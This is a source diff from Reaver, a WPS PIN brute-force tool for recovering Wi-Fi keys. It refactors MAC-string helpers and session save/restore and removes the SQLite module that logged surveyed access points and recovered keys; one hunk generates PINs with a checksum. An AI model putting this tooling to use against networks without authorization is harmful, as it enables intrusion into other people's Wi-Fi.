1077 | uint16_t get_args; /* Type and number of args */ | |
1081 | 1078 | char name[IFNAMSIZ]; /* Name of the extension */ |
1082 | 1079 | }; |
1083 | 1080 | |
1093 | 1090 | */ |
1094 | 1091 | struct iw_event |
1095 | 1092 | { |
1096 | __u16 len; /* Real lenght of this stuff */ | |
1097 | __u16 cmd; /* Wireless IOCTL */ | |
1093 | uint16_t len; /* Real lenght of this stuff */ | |
1094 | uint16_t cmd; /* Wireless IOCTL */ | |
1098 | 1095 | union iwreq_data u; /* IOCTL fixed payload */ |
1099 | 1096 | }; |
1100 | 1097 | |
1102 | 1099 | #define IW_EV_LCP_LEN (sizeof(struct iw_event) - sizeof(union iwreq_data)) |
1103 | 1100 | /* Size of the various events */ |
1104 | 1101 | #define IW_EV_CHAR_LEN (IW_EV_LCP_LEN + IFNAMSIZ) |
1105 | #define IW_EV_UINT_LEN (IW_EV_LCP_LEN + sizeof(__u32)) | |
1102 | #define IW_EV_UINT_LEN (IW_EV_LCP_LEN + sizeof(uint32_t)) | |
1106 | 1103 | #define IW_EV_FREQ_LEN (IW_EV_LCP_LEN + sizeof(struct iw_freq)) |
1107 | 1104 | #define IW_EV_PARAM_LEN (IW_EV_LCP_LEN + sizeof(struct iw_param)) |
1108 | 1105 | #define IW_EV_ADDR_LEN (IW_EV_LCP_LEN + sizeof(struct sockaddr)) |
33 | 33 | #include "misc.h" |
34 | 34 | |
35 | 35 | /* Converts a raw MAC address to a colon-delimited string */ |
36 | unsigned char *mac2str(unsigned char *mac, char delim) | |
36 | char *mac2str(unsigned char *mac, char delim) | |
37 | 37 | { |
38 | int i = 0, str_len = 0; | |
39 | int str_mult = 3; | |
40 | int buf_size = str_mult+1; | |
41 | unsigned char *str = NULL; | |
42 | unsigned char buf[4] = { 0 }; /* 4 == buf_size */ | |
43 | ||
44 | str_len = (MAC_ADDR_LEN * str_mult) + 1; | |
45 | ||
46 | str = malloc(str_len); | |
47 | if(!str) | |
48 | { | |
49 | perror("malloc"); | |
50 | } else { | |
51 | memset(str, 0, str_len); | |
52 | ||
53 | for(i=0; i<MAC_ADDR_LEN; i++) | |
54 | { | |
55 | memset((char *) &buf, 0, buf_size); | |
56 | snprintf((char *) &buf, buf_size, "%.2X%c", mac[i], delim); | |
57 | strncat((char *) str, (char *) &buf, str_mult); | |
58 | } | |
59 | memset(str+((MAC_ADDR_LEN*str_mult)-1), 0, 1); | |
60 | } | |
61 | ||
62 | return str; | |
38 | char nyu[6*3]; | |
39 | #define PAT "%.2X%c" | |
40 | #define PRT(X) mac[X], delim | |
41 | #define PBT "%.2X" | |
42 | if(delim) | |
43 | snprintf(nyu, sizeof nyu, PAT PAT PAT PAT PAT PBT, PRT(0), PRT(1), PRT(2), PRT(3), PRT(4), mac[5]); | |
44 | else | |
45 | snprintf(nyu, sizeof nyu, PBT PBT PBT PBT PBT PBT, mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); | |
46 | return strdup(nyu); | |
63 | 47 | } |
64 | 48 | |
65 | 49 | /* Converts a colon-delimited string to a raw MAC address */ |
66 | void str2mac(unsigned char *str, unsigned char *mac) | |
50 | void str2mac(char *str, unsigned char *mac) | |
67 | 51 | { |
68 | 52 | char *delim_ptr = NULL, *num_ptr = NULL, *tmp_str = NULL; |
69 | 53 | char delim = ':'; |
70 | 54 | int count = 0; |
71 | 55 | |
72 | tmp_str = strdup((char *) str); | |
56 | tmp_str = strdup(str); | |
73 | 57 | delim_ptr = num_ptr = tmp_str; |
74 | 58 | |
75 | 59 | while((delim_ptr = strchr(delim_ptr, delim)) && count < (MAC_ADDR_LEN-1)) |
41 | 41 | #include "init.h" |
42 | 42 | #include "globule.h" |
43 | 43 | |
44 | unsigned char *mac2str(unsigned char *mac, char delim); | |
45 | void str2mac(unsigned char *str, unsigned char *mac); | |
44 | char *mac2str(unsigned char *mac, char delim); | |
45 | void str2mac(char *str, unsigned char *mac); | |
46 | 46 | void cprintf(enum debug_level level, const char *fmt, ...); |
47 | 47 | void daemonize(void); |
48 | 48 | void pcap_sleep(int seconds); |
78 | 78 | else |
79 | 79 | { |
80 | 80 | /* Generate a 7-digit pin from the given key index values */ |
81 | snprintf(key, pin_len, "%s%s", p1_value, p2_value); | |
81 | snprintf(key, pin_len-1, "%s%s", p1_value, p2_value); | |
82 | 82 | |
83 | 83 | /* Generate and append the pin checksum digit */ |
84 | 84 | snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key))); |
32 | 32 | |
33 | 33 | #include "session.h" |
34 | 34 | |
35 | /* Does the configuration directory exist? Returns 1 for yes, 0 for no. */ | |
36 | static int configuration_directory_exists() | |
37 | { | |
38 | struct stat dirstat; | |
39 | return (stat(CONF_DIR, &dirstat) == 0); | |
40 | } | |
41 | ||
42 | static void gen_sessionfile_name(const char* bssid, char* outbuf) { | |
43 | #ifdef SAVETOCURRENT | |
44 | snprintf(outbuf, FILENAME_MAX, "%s.%s", bssid, CONF_EXT); | |
45 | #else | |
46 | int cde = configuration_directory_exists(); | |
47 | snprintf(outbuf, FILENAME_MAX, "%s%s%s.%s", | |
48 | cde?CONF_DIR:"", cde?"/":"", bssid, CONF_EXT); | |
49 | #endif | |
50 | } | |
51 | ||
35 | 52 | int restore_session() |
36 | 53 | { |
37 | 54 | struct stat wpstat = { 0 }; |
38 | 55 | char line[MAX_LINE_SIZE] = { 0 }; |
39 | 56 | char temp[P1_READ_LEN] = { 0 }; |
40 | char *file = NULL; | |
41 | unsigned char *bssid = NULL; | |
57 | char file[FILENAME_MAX]; | |
58 | char *bssid = NULL; | |
42 | 59 | char answer = 0; |
43 | 60 | FILE *fp = NULL; |
44 | 61 | int ret_val = 0, i = 0; |
49 | 66 | */ |
50 | 67 | if(get_session()) |
51 | 68 | { |
52 | file = strdup(get_session()); | |
69 | strcpy(file, get_session()); | |
53 | 70 | } |
54 | 71 | else |
55 | 72 | { |
56 | file = malloc(FILENAME_MAX); | |
57 | if(!file) | |
58 | { | |
59 | return ret_val; | |
60 | } | |
61 | memset(file, 0, FILENAME_MAX); | |
62 | ||
63 | 73 | bssid = mac2str(get_bssid(), '\0'); |
64 | snprintf(file, FILENAME_MAX, "%s/%s.%s", CONF_DIR, bssid, CONF_EXT); | |
74 | gen_sessionfile_name(bssid, file); | |
65 | 75 | free(bssid); |
66 | 76 | } |
67 | 77 | |
69 | 79 | * If a session was explicitly specified, or if the auto detect option was specified, |
70 | 80 | * then the answer to any of the following questions will be 'yes'. |
71 | 81 | */ |
72 | if(get_session() || get_auto_detect_options()) | |
82 | if(get_session()) | |
73 | 83 | { |
74 | 84 | answer = 'y'; |
75 | 85 | } |
92 | 102 | if((fp = fopen(file, "r"))) |
93 | 103 | { |
94 | 104 | /* Get the key1 index value */ |
95 | if(fgets((char *) &line, MAX_LINE_SIZE, fp) != NULL) | |
105 | if(fgets(line, MAX_LINE_SIZE, fp) != NULL) | |
96 | 106 | { |
97 | 107 | set_p1_index(atoi(line)); |
98 | memset((char *) &line, 0, MAX_LINE_SIZE); | |
108 | memset(line, 0, MAX_LINE_SIZE); | |
99 | 109 | |
100 | 110 | /* Get the key2 index value */ |
101 | if(fgets((char *) &line, MAX_LINE_SIZE, fp) != NULL) | |
111 | if(fgets(line, MAX_LINE_SIZE, fp) != NULL) | |
102 | 112 | { |
103 | 113 | set_p2_index(atoi(line)); |
104 | memset((char *) &line, 0, MAX_LINE_SIZE); | |
114 | memset(line, 0, MAX_LINE_SIZE); | |
105 | 115 | |
106 | 116 | /* Get the key status value */ |
107 | if(fgets((char *) &line, MAX_LINE_SIZE, fp) != NULL) | |
117 | if(fgets(line, MAX_LINE_SIZE, fp) != NULL) | |
108 | 118 | { |
109 | 119 | set_key_status(atoi(line)); |
110 | 120 | |
111 | 121 | /* Read in all p1 values */ |
112 | 122 | for(i=0; i<P1_SIZE; i++) |
113 | 123 | { |
114 | memset((char *) &temp, 0, P1_READ_LEN); | |
115 | ||
116 | if(fgets((char *) &temp, P1_READ_LEN, fp) != NULL) | |
124 | memset(temp, 0, P1_READ_LEN); | |
125 | ||
126 | if(fgets(temp, P1_READ_LEN, fp) != NULL) | |
117 | 127 | { |
118 | 128 | /* NULL out the new line character */ |
119 | 129 | temp[P1_STR_LEN] = 0; |
120 | set_p1(i, (char *) &temp); | |
130 | set_p1(i, temp); | |
121 | 131 | } |
122 | 132 | } |
123 | 133 | |
124 | 134 | /* Read in all p2 values */ |
125 | 135 | for(i=0; i<P2_SIZE; i++) |
126 | 136 | { |
127 | memset((char *) &temp, 0, P1_READ_LEN); | |
128 | ||
129 | if(fgets((char *) &temp, P2_READ_LEN, fp) != NULL) | |
137 | memset(temp, 0, P1_READ_LEN); | |
138 | ||
139 | if(fgets(temp, P2_READ_LEN, fp) != NULL) | |
130 | 140 | { |
131 | 141 | /* NULL out the new line character */ |
132 | 142 | temp[P2_STR_LEN] = 0; |
133 | set_p2(i, (char *) &temp); | |
143 | set_p2(i, temp); | |
134 | 144 | } |
135 | 145 | } |
136 | 146 | |
153 | 163 | cprintf(INFO, "[+] Restored previous session\n"); |
154 | 164 | } |
155 | 165 | |
156 | free(file); | |
157 | 166 | return ret_val; |
158 | 167 | } |
159 | 168 | |
160 | 169 | int save_session() |
161 | 170 | { |
162 | unsigned char *bssid = NULL; | |
171 | char *bssid = NULL; | |
163 | 172 | char *wpa_key = NULL, *essid = NULL, *pretty_bssid = NULL; |
164 | 173 | char file_name[FILENAME_MAX] = { 0 }; |
165 | 174 | char line[MAX_LINE_SIZE] = { 0 }; |
170 | 179 | |
171 | 180 | wps = get_wps(); |
172 | 181 | bssid = mac2str(get_bssid(), '\0'); |
173 | pretty_bssid = (char *) mac2str(get_bssid(), ':'); | |
182 | pretty_bssid = mac2str(get_bssid(), ':'); | |
174 | 183 | |
175 | 184 | if(wps) |
176 | 185 | { |
190 | 199 | */ |
191 | 200 | if(get_session()) |
192 | 201 | { |
193 | memcpy((char *) &file_name, get_session(), FILENAME_MAX-1); | |
202 | strcpy(file_name, get_session()); | |
194 | 203 | } |
195 | 204 | else |
196 | { | |
197 | /* | |
198 | * If the configuration directory exists, save the session file there; else, save it to the | |
199 | * current working directory. | |
200 | */ | |
201 | if(configuration_directory_exists()) | |
202 | { | |
203 | snprintf((char *) &file_name, FILENAME_MAX, "%s/%s.%s", CONF_DIR, bssid, CONF_EXT); | |
204 | } | |
205 | else | |
206 | { | |
207 | snprintf((char *) &file_name, FILENAME_MAX, "%s.%s", bssid, CONF_EXT); | |
208 | } | |
205 | { | |
206 | gen_sessionfile_name(bssid, file_name); | |
209 | 207 | } |
210 | 208 | |
211 | 209 | /* Don't bother saving anything if nothing has been done */ |
212 | 210 | if((get_p1_index() > 0) || (get_p2_index() > 0)) |
213 | 211 | { |
214 | if((fp = fopen((char *) &file_name, "w"))) | |
212 | if((fp = fopen(file_name, "w"))) | |
215 | 213 | { |
216 | snprintf((char *) &line, MAX_LINE_SIZE, "%d\n", get_p1_index()); | |
217 | write_size = strlen((char *) &line); | |
214 | snprintf(line, MAX_LINE_SIZE, "%d\n", get_p1_index()); | |
215 | write_size = strlen(line); | |
218 | 216 | |
219 | 217 | /* Save key1 index value */ |
220 | if(fwrite((char *) &line, 1, write_size, fp) == write_size) | |
218 | if(fwrite(line, 1, write_size, fp) == write_size) | |
221 | 219 | { |
222 | memset((char *) &line, 0, MAX_LINE_SIZE); | |
223 | snprintf((char *) &line, MAX_LINE_SIZE, "%d\n", get_p2_index()); | |
224 | write_size = strlen((char *) &line); | |
220 | memset(line, 0, MAX_LINE_SIZE); | |
221 | snprintf(line, MAX_LINE_SIZE, "%d\n", get_p2_index()); | |
222 | write_size = strlen(line); | |
225 | 223 | |
226 | 224 | /* Save key2 index value */ |
227 | if(fwrite((char *) &line, 1, write_size, fp) == write_size) | |
225 | if(fwrite(line, 1, write_size, fp) == write_size) | |
228 | 226 | { |
229 | memset((char *) &line, 0, MAX_LINE_SIZE); | |
230 | snprintf((char *) &line, MAX_LINE_SIZE, "%d\n", get_key_status()); | |
231 | write_size = strlen((char *) &line); | |
227 | memset(line, 0, MAX_LINE_SIZE); | |
228 | snprintf(line, MAX_LINE_SIZE, "%d\n", get_key_status()); | |
229 | write_size = strlen(line); | |
232 | 230 | |
233 | 231 | /* Save key status value */ |
234 | if(fwrite((char *) &line, 1, write_size, fp) == write_size) | |
232 | if(fwrite(line, 1, write_size, fp) == write_size) | |
235 | 233 | { |
236 | 234 | /* Save all the p1 values */ |
237 | 235 | for(i=0; i<P1_SIZE; i++) |
269 | 267 | { |
270 | 268 | essid = get_ssid(); |
271 | 269 | } |
272 | ||
273 | update_history(pretty_bssid, essid, attempts, wpa_key); | |
274 | 270 | |
275 | 271 | ret_val = 1; |
276 | 272 | } |
292 | 288 | return ret_val; |
293 | 289 | } |
294 | 290 | |
295 | /* Does the configuration directory exist? Returns 1 for yes, 0 for no. */ | |
296 | int configuration_directory_exists() | |
297 | { | |
298 | struct stat dirstat = { 0 }; | |
299 | int retval = 0; | |
300 | ||
301 | if(stat(CONF_DIR, &dirstat) == 0) | |
302 | { | |
303 | retval = 1; | |
304 | } | |
305 | ||
306 | return retval; | |
307 | } |
38 | 38 | #include "defs.h" |
39 | 39 | #include "misc.h" |
40 | 40 | #include "globule.h" |
41 | #include "sql.h" | |
42 | 41 | #include "config.h" |
43 | 42 | |
44 | 43 | #ifndef CONF_DIR |
55 | 54 | |
56 | 55 | int restore_session(); |
57 | 56 | int save_session(); |
58 | int configuration_directory_exists(); | |
59 | 57 | |
60 | 58 | #endif |
0 | /* | |
1 | * Reaver - SQLite wrapper functions | |
2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> | |
3 | * | |
4 | * This program is free software; you can redistribute it and/or modify | |
5 | * it under the terms of the GNU General Public License as published by | |
6 | * the Free Software Foundation; either version 2 of the License, or | |
7 | * (at your option) any later version. | |
8 | * | |
9 | * This program is distributed in the hope that it will be useful, | |
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of | |
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
12 | * GNU General Public License for more details. | |
13 | * | |
14 | * You should have received a copy of the GNU General Public License | |
15 | * along with this program; if not, write to the Free Software | |
16 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA | |
17 | * | |
18 | * | |
19 | * In addition, as a special exception, the copyright holders give | |
20 | * permission to link the code of portions of this program with the | |
21 | * OpenSSL library under certain conditions as described in each | |
22 | * individual source file, and distribute linked combinations | |
23 | * including the two. | |
24 | * You must obey the GNU General Public License in all respects | |
25 | * for all of the code used other than OpenSSL. * If you modify | |
26 | * file(s) with this exception, you may extend this exception to your | |
27 | * version of the file(s), but you are not obligated to do so. * If you | |
28 | * do not wish to do so, delete this exception statement from your | |
29 | * version. * If you delete this exception statement from all source | |
30 | * files in the program, then also delete it here. | |
31 | */ | |
32 | ||
33 | #include "sql.h" | |
34 | ||
35 | sqlite3 *db = NULL; | |
36 | ||
37 | int sql_init(void) | |
38 | { | |
39 | int retval = 0; | |
40 | ||
41 | if(!db) | |
42 | { | |
43 | if(sqlite3_open(REAVER_DATABASE, &db) == 0) | |
44 | { | |
45 | retval = 1; | |
46 | } | |
47 | } | |
48 | ||
49 | return retval; | |
50 | } | |
51 | ||
52 | int create_ap_table(void) | |
53 | { | |
54 | int err_code = 0; | |
55 | char *drop_table = sqlite3_mprintf(DROP_TABLE, AP_TABLE); | |
56 | char *create_table = sqlite3_mprintf(CREATE_TABLE, AP_TABLE); | |
57 | ||
58 | if(db && drop_table && create_table) | |
59 | { | |
60 | sql_exec(drop_table); | |
61 | err_code = sql_exec(create_table); | |
62 | ||
63 | sqlite3_free(drop_table); | |
64 | sqlite3_free(create_table); | |
65 | } | |
66 | ||
67 | return err_code; | |
68 | } | |
69 | ||
70 | int should_probe(char *bssid) | |
71 | { | |
72 | int n = 0, yn = 0, size = 0, err = 0, max = get_max_num_probes(); | |
73 | char *ns = NULL; | |
74 | char *q = sqlite3_mprintf("SELECT probes FROM %s WHERE bssid = %Q AND complete = 0", AP_TABLE, bssid); | |
75 | ||
76 | if(q) | |
77 | { | |
78 | ns = get(q, &size, &err); | |
79 | if(err == SQLITE_OK && ns && size > 0) | |
80 | { | |
81 | n = atoi(ns); | |
82 | } | |
83 | ||
84 | if(max == 0 || n < max) | |
85 | { | |
86 | yn = 1; | |
87 | } | |
88 | ||
89 | sqlite3_free(q); | |
90 | } | |
91 | ||
92 | if(ns) free(ns); | |
93 | return yn; | |
94 | } | |
95 | ||
96 | int is_done(char *bssid) | |
97 | { | |
98 | int size = 0, err = 0, rv = 0; | |
99 | char *s = NULL, *q = sqlite3_mprintf("SELECT complete FROM %s WHERE bssid = %Q", AP_TABLE, bssid); | |
100 | ||
101 | if(q) | |
102 | { | |
103 | s = get(q, &size, &err); | |
104 | ||
105 | if(err == SQLITE_OK && size > 0 && s != NULL) | |
106 | { | |
107 | rv = atoi(s); | |
108 | free(s); | |
109 | } | |
110 | ||
111 | sqlite3_free(q); | |
112 | } | |
113 | ||
114 | return rv; | |
115 | } | |
116 | ||
117 | int mark_ap_complete(char *bssid) | |
118 | { | |
119 | int rv = 0; | |
120 | char *q = sqlite3_mprintf("UPDATE %s SET probes = '%d', complete = '1' WHERE bssid = %Q", AP_TABLE, get_max_num_probes(), bssid); | |
121 | ||
122 | if(q) | |
123 | { | |
124 | if(sql_exec(q) == SQLITE_OK) | |
125 | { | |
126 | rv = 1; | |
127 | } | |
128 | ||
129 | sqlite3_free(q); | |
130 | } | |
131 | ||
132 | return rv; | |
133 | } | |
134 | ||
135 | int update_probe_count(char *bssid) | |
136 | { | |
137 | int rv = 0; | |
138 | char *q = sqlite3_mprintf("UPDATE %s SET probes = probes+1 WHERE bssid = %Q", AP_TABLE, bssid); | |
139 | ||
140 | if(q) | |
141 | { | |
142 | if(sql_exec(q) == SQLITE_OK) | |
143 | { | |
144 | rv = 1; | |
145 | } | |
146 | ||
147 | sqlite3_free(q); | |
148 | } | |
149 | ||
150 | return rv; | |
151 | } | |
152 | ||
153 | int update_ap_power(char *bssid, int8_t ssi) | |
154 | { | |
155 | int rv = 0; | |
156 | char *q = sqlite3_mprintf("UPDATE %s SET rssi = '%d' WHERE bssid = %Q", AP_TABLE, ssi, bssid); | |
157 | ||
158 | if(q) | |
159 | { | |
160 | if(sql_exec(q) == SQLITE_OK) | |
161 | { | |
162 | rv = 1; | |
163 | } | |
164 | ||
165 | sqlite3_free(q); | |
166 | } | |
167 | ||
168 | return rv; | |
169 | } | |
170 | ||
171 | int update_history(char *bssid, char *essid, int attempts, char *key) | |
172 | { | |
173 | int result = 0; | |
174 | char *q = sqlite3_mprintf("INSERT OR REPLACE INTO %s (bssid, essid, attempts, key) VALUES (%Q, %Q, '%d', %Q)", HISTORY_TABLE, bssid, essid, attempts, key); | |
175 | ||
176 | if(q) | |
177 | { | |
178 | if(sql_exec(q) == SQLITE_OK) | |
179 | { | |
180 | result = 1; | |
181 | } | |
182 | ||
183 | sqlite3_free(q); | |
184 | } | |
185 | ||
186 | return result; | |
187 | } | |
188 | ||
189 | int insert(char *bssid, char *essid, struct libwps_data *wps, int encryption, int rssi) | |
190 | { | |
191 | int result = 0; | |
192 | char *q = sqlite3_mprintf("INSERT INTO %s (bssid, essid, manufacturer, model_name, model_number, device_name, version, state, locked, encryption, probes, rssi, rowid) VALUES (%Q, %Q, %Q, %Q, %Q, %Q, '%d', '%d', '%d', '%d', '0', '%d', '%d')", AP_TABLE, bssid, essid, wps->manufacturer, wps->model_name, wps->model_number, wps->device_name, wps->version, wps->state, wps->locked, encryption, rssi, sqlite3_last_insert_rowid(db)); | |
193 | ||
194 | if(q) | |
195 | { | |
196 | if(sql_exec(q) == SQLITE_OK) | |
197 | { | |
198 | result = 1; | |
199 | } | |
200 | ||
201 | sqlite3_free(q); | |
202 | } | |
203 | ||
204 | return result; | |
205 | } | |
206 | ||
207 | int update(char *bssid, char *essid, struct libwps_data *wps, int encryption) | |
208 | { | |
209 | int result = 0; | |
210 | char *q = NULL; | |
211 | ||
212 | if(wps) | |
213 | { | |
214 | q = sqlite3_mprintf("UPDATE %s SET essid = %Q, manufacturer = %Q, model_name = %Q, model_number = %Q, device_name = %Q, version ='%d', state = '%d', locked = '%d', encryption = '%d' WHERE bssid = %Q AND complete <> '1'", AP_TABLE, essid, wps->manufacturer, wps->model_name, wps->model_number, wps->device_name, wps->version, wps->state, wps->locked, encryption, bssid); | |
215 | ||
216 | if(q) | |
217 | { | |
218 | if(sql_exec(q) == SQLITE_OK) | |
219 | { | |
220 | result = 1; | |
221 | } | |
222 | ||
223 | sqlite3_free(q); | |
224 | } | |
225 | } | |
226 | ||
227 | return result; | |
228 | } | |
229 | ||
230 | int sql_exec(char *query) | |
231 | { | |
232 | int result = SQLITE_ERROR; | |
233 | ||
234 | if(query) | |
235 | { | |
236 | do | |
237 | { | |
238 | result = sqlite3_exec(db, query, NULL, NULL, NULL); | |
239 | usleep(BUSY_WAIT_PERIOD); | |
240 | } | |
241 | while(result == SQLITE_BUSY); | |
242 | } | |
243 | ||
244 | return result; | |
245 | } | |
246 | ||
247 | char *get_db_ssid(char *bssid) | |
248 | { | |
249 | char *ssid = NULL; | |
250 | int size = 0, err = 0; | |
251 | char *q = sqlite3_mprintf("SELECT essid FROM %s WHERE bssid = %Q LIMIT 1", AP_TABLE, bssid); | |
252 | ||
253 | if(q) | |
254 | { | |
255 | ssid = (char *) get(q, &size, &err); | |
256 | if(err != SQLITE_OK || size < 0) | |
257 | { | |
258 | if(ssid) free(ssid); | |
259 | ssid = NULL; | |
260 | } | |
261 | ||
262 | sqlite3_free(q); | |
263 | } | |
264 | ||
265 | return ssid; | |
266 | } | |
267 | ||
268 | char **auto_detect_settings(char *bssid, int *argc) | |
269 | { | |
270 | int size = 0, err = 0, i = 0; | |
271 | char *args = NULL, *token = NULL; | |
272 | char **argv = NULL, **tmp = NULL; | |
273 | char *q1 = sqlite3_mprintf("SELECT args FROM %s WHERE model_name = (SELECT model_name FROM %s WHERE bssid = %Q LIMIT 1) AND model_number = (SELECT model_number FROM %s WHERE bssid = %Q LIMIT 1) AND device_name = (SELECT device_name FROM %s WHERE bssid = %Q LIMIT 1) LIMIT 1", SETTINGS_TABLE, AP_TABLE, bssid, AP_TABLE, bssid, AP_TABLE, bssid); | |
274 | char *q2 = sqlite3_mprintf("SELECT args FROM %s WHERE manufacturer LIKE (SELECT manufacturer FROM %s WHERE bssid = %Q LIMIT 1) LIMIT 1", SETTINGS_TABLE, AP_TABLE, bssid); | |
275 | ||
276 | if(q1 && q2) | |
277 | { | |
278 | args = (char *) get(q1, &size, &err); | |
279 | if(err != SQLITE_OK || size <= 0 || args == NULL) | |
280 | { | |
281 | args = (char *) get(q2, &size, &err); | |
282 | } | |
283 | ||
284 | if(err == SQLITE_OK && size > 0 && args != NULL) | |
285 | { | |
286 | token = strtok(args, " "); | |
287 | if(token) | |
288 | { | |
289 | argv = malloc(sizeof(char *)); | |
290 | argv[i] = strdup("reaver"); | |
291 | i++; | |
292 | ||
293 | do | |
294 | { | |
295 | tmp = argv; | |
296 | argv = realloc(argv, ((i + 1) * sizeof(char *))); | |
297 | if(!argv) | |
298 | { | |
299 | free(tmp); | |
300 | i = 0; | |
301 | break; | |
302 | } | |
303 | else if(argv != tmp) | |
304 | { | |
305 | free(tmp); | |
306 | } | |
307 | ||
308 | argv[i] = strdup(token); | |
309 | i++; | |
310 | ||
311 | } while((token = strtok(NULL, " ")) != NULL); | |
312 | } | |
313 | ||
314 | free(args); | |
315 | } | |
316 | ||
317 | sqlite3_free(q1); | |
318 | sqlite3_free(q2); | |
319 | } | |
320 | ||
321 | *argc = i; | |
322 | ||
323 | return argv; | |
324 | } | |
325 | ||
326 | /* Execute given SQL query. Will only return the FIRST row of the FIRST column of data. Caller must free the returned pointer. */ | |
327 | void *get(char *query, int *result_size, int *err_code) | |
328 | { | |
329 | sqlite3_stmt *stmt = NULL; | |
330 | int rc = 0, col_type = 0; | |
331 | void *result = NULL, *tmp_result = NULL; | |
332 | ||
333 | *result_size = 0; | |
334 | ||
335 | if(!query){ | |
336 | return NULL; | |
337 | } | |
338 | ||
339 | /* Prepare the SQL query */ | |
340 | rc = sqlite3_prepare_v2(db,query,strlen(query),&stmt,NULL); | |
341 | if(rc != SQLITE_OK){ | |
342 | *err_code = sqlite3_errcode(db); | |
343 | return NULL; | |
344 | } | |
345 | ||
346 | /* Loop until the query has finished */ | |
347 | while(((rc = sqlite3_step(stmt)) != SQLITE_DONE) && (result == NULL)){ | |
348 | switch(rc){ | |
349 | ||
350 | case SQLITE_ERROR: | |
351 | *err_code = sqlite3_errcode(db); | |
352 | sqlite3_finalize(stmt); | |
353 | return NULL; | |
354 | break; | |
355 | ||
356 | case SQLITE_BUSY: | |
357 | /* If the table is locked, wait then try again */ | |
358 | usleep(BUSY_WAIT_PERIOD); | |
359 | break; | |
360 | ||
361 | case SQLITE_ROW: | |
362 | { | |
363 | col_type = sqlite3_column_type(stmt,0); | |
364 | switch(col_type) | |
365 | { | |
366 | case SQLITE_TEXT: | |
367 | case SQLITE_INTEGER: | |
368 | tmp_result = (void *) sqlite3_column_text(stmt,0); | |
369 | break; | |
370 | ||
371 | case SQLITE_BLOB: | |
372 | tmp_result = (void *) sqlite3_column_blob(stmt,0); | |
373 | break; | |
374 | ||
375 | default: | |
376 | continue; | |
377 | } | |
378 | ||
379 | /* Get the size of the data we just received from the database */ | |
380 | *result_size = sqlite3_column_bytes(stmt,0); | |
381 | ||
382 | /* Create a copy of tmp_result to pass back to the caller */ | |
383 | if((tmp_result != NULL) && (*result_size > 0)){ | |
384 | if((result = malloc(*result_size+1)) == NULL){ | |
385 | perror("Malloc failure"); | |
386 | return NULL; | |
387 | } | |
388 | memset(result,0,*result_size+1); | |
389 | memcpy(result,tmp_result,*result_size); | |
390 | } | |
391 | break; | |
392 | } | |
393 | } | |
394 | } | |
395 | ||
396 | sqlite3_finalize(stmt); | |
397 | *err_code = sqlite3_errcode(db); | |
398 | ||
399 | return result; | |
400 | } | |
401 | ||
402 | char *sql_error_string(void) | |
403 | { | |
404 | return (char *) sqlite3_errmsg(db); | |
405 | } | |
406 | ||
407 | void sql_cleanup(void) | |
408 | { | |
409 | sqlite3_close(db); | |
410 | db = NULL; | |
411 | } |
0 | /* | |
1 | * Reaver - SQLite wrapper functions | |
2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> | |
3 | * | |
4 | * This program is free software; you can redistribute it and/or modify | |
5 | * it under the terms of the GNU General Public License as published by | |
6 | * the Free Software Foundation; either version 2 of the License, or | |
7 | * (at your option) any later version. | |
8 | * | |
9 | * This program is distributed in the hope that it will be useful, | |
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of | |
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
12 | * GNU General Public License for more details. | |
13 | * | |
14 | * You should have received a copy of the GNU General Public License | |
15 | * along with this program; if not, write to the Free Software | |
16 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA | |
17 | * | |
18 | * | |
19 | * In addition, as a special exception, the copyright holders give | |
20 | * permission to link the code of portions of this program with the | |
21 | * OpenSSL library under certain conditions as described in each | |
22 | * individual source file, and distribute linked combinations | |
23 | * including the two. | |
24 | * You must obey the GNU General Public License in all respects | |
25 | * for all of the code used other than OpenSSL. * If you modify | |
26 | * file(s) with this exception, you may extend this exception to your | |
27 | * version of the file(s), but you are not obligated to do so. * If you | |
28 | * do not wish to do so, delete this exception statement from your | |
29 | * version. * If you delete this exception statement from all source | |
30 | * files in the program, then also delete it here. | |
31 | */ | |
32 | ||
33 | #ifndef _SQL_H_ | |
34 | #define _SQL_H_ | |
35 | ||
36 | #include <unistd.h> | |
37 | #include <string.h> | |
38 | #include <sqlite3.h> | |
39 | #include <libwps.h> | |
40 | #include "defs.h" | |
41 | #include "globule.h" | |
42 | ||
43 | #ifndef REAVER_DATABASE | |
44 | #define REAVER_DATABASE "/etc/reaver/reaver.db" | |
45 | #endif | |
46 | ||
47 | #define BUSY_WAIT_PERIOD 100 | |
48 | #define SETTINGS_TABLE "auto" | |
49 | #define HISTORY_TABLE "history" | |
50 | #define AP_TABLE "survey" | |
51 | #define DROP_TABLE "DROP TABLE %s" | |
52 | #define CREATE_TABLE "CREATE TABLE %s (bssid TEXT PRIMARY KEY NOT NULL, essid TEXT, manufacturer TEXT, model_name TEXT, model_number TEXT, device_name TEXT, version INTEGER DEFAULT 0, state INTEGER DEFAULT 0, locked INTEGER DEFAULT 0, encryption INTEGER DEFAULT 0, probes INTEGER DEFAULT 0, rssi TEXT, complete INTEGER DEFAULT 0, rowid INTEGER NOT NULL)" | |
53 | ||
54 | int sql_init(void); | |
55 | int create_ap_table(void); | |
56 | int update_probe_count(char *bssid); | |
57 | int update_ap_power(char *bssid, int8_t ssi); | |
58 | int update_history(char *bssid, char *essid, int attempts, char *key); | |
59 | int mark_ap_complete(char *bssid); | |
60 | int is_done(char *bssid); | |
61 | int should_probe(char *bssid); | |
62 | int update(char *bssid, char *essid, struct libwps_data *wps, int encryption); | |
63 | int insert(char *bssid, char *essid, struct libwps_data *wps, int encryption, int rssi); | |
64 | char *get_db_ssid(char *bssid); | |
65 | char **auto_detect_settings(char *bssid, int *argc); | |
66 | int sql_exec(char *query); | |
67 | void *get(char *query, int *result_size, int *err_code); | |
68 | char *sql_error_string(void); | |
69 | void sql_cleanup(void); | |
70 | ||
71 | #endif |
14 | 14 | #include "includes.h" |
15 | 15 | |
16 | 16 | #include "common.h" |
17 | #include "wps.h" | |
17 | 18 | |
18 | 19 | |
